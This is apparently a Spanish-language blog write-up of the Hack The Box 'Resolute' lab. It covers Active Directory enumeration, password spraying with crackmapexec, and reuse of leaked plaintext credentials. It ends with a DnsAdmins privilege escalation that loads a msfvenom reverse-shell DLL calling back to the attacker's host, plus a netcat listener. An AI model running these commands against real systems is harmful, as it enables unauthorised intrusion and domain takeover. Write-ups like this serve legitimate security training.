creep33

creep33

OSCP, BSCP, OSWP, eJPT
Cybersecurity Analyst && Pentester

HTB-Resolute

IP -> 10.10.10.169

Reconocimiento

Nmap

Utilizamos nmap y obtenemos los siguientes resultados. Resolute Nmap Result

Crackmapexec

Usamos Crackmapexec para enumerar información del Active Directory y añadimos el dominio al /etc/hosts

OS: Windows Server 2016 x64 Dominio: megabank.local Signing: True SMBv1: True

smbclient y smbhost

Listamos servicios del SMB mediante un [null session](/SMB/

No encontramos nada

rpc

Mediante el servicio rpc enumeramos los usuarios que pertenecen al Active Directory

kerberos

Validamos los usuarios que hemos obtenido mediante Kerberos con la utilidad [kerbrute]((/Kerberos/)

rpc

Mediante rpc enumeramos los grupos del Active Directory

Obtenemos un listado de usuarios

crackmapexc

Con la herramienta Crackmapexec validamos los usuarios y tomando como contraseña los mismos usuarios

crackmapexec smb 10.10.10.169 -u users -p users

GetNPUsers.py

Probamos un ASREPRoast con la herramienta [GetNPUsers.py]((/ASREPRoast/)

rpc

Seguimos enumerando mediante rpc las descripciones de los usuarios.

marko: Account created. Password set to Welcome123!

Crackmapexec

Con Crackmapexec validamos si es válida la credencial

Es incorrecta

Pero vamos a probar con todo el listado de usuarios

crackmapexec smb 10.10.10.169 -u users -p 'Welcome123!' --continue-on-success

Melanie tiene esta credencial

Aunque Melanie tiene esta credencial, no tiene “pwned” por smb, por lo tanto no podemos conectarnos a una shell interactiva.

GetUserSPN.py

Probamos un Kerberoasting Attack con la credenciales obtenidas pero no obtenemos ningun TGS

Crackmapexec

Probamos las credenciales por winrm

crackmapexec winrm 10.10.10.169 -u 'melanie' -p 'Welcome123!'

PWNED

Exploitation

Evil-winrm

[winrm. Nos conectamos a la máquina como el usuario melanie.

user.txt

User-pivoting

Enumeramos el sistema.

whoami /priv
net user melanie
whoami /all
net users
cd C:\\
ls

Poco contenido

ls -force

Más contenido directorio: PSTranscripts Listamos todo lo que hay bajo esae directorio

ls -force PSTranscripts/ -recurse

Archivo *.txt Mostramos el contenido del txt

type <file>.txt

PowerShell LOG Credenciales: ryan -> Serv3r4Admin4cc123!

Crackmapexec

Probamos las credenciales en crackmapexec tanto por SMB como por winrm

SMB: PWNED WINRM: PWNED

Exploitation

Evil-winrm

[winrm. Nos conectamos a la máquina como el usuario ryan.

Privilege-escalation

Enumeramos el directorio del usuario ryan y los privilegios del usuario.

whoami /priv
net user melanie
whoami /all
net users
dir Desktop

Desktop: note.txt Group: DnsAdmins

Buscamos en hacktricks acerca del DnsAdmins

Nos permite cargar una DLL maliciosa.

Exploitation

msfvenom

Nos creamos la dll maliciosa con msfvenom.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.10 LPORT=443 -f dll -o rev.dll

Creamos un servicio compartido con [[smbserver.py]]

Cargamos la dll

dnscmd.exe /config /serverlevelplugindll \\10.10.14.10\smbFolder\rev.dll

Reniciamos el servicio

Necesitamos el hostname

hostname

Hostname: Resolute

Nos ponemos en escucha

rlwrap nc -nlvp 443

Reiniciamos el servicio

sc.exe \\Resolute stop dns
sc.exe \\Resolute start dns

root.txt

Escrito el 07-12-2021 a las 08:00 pm por creep33.

Tags:

Categories:

Updated: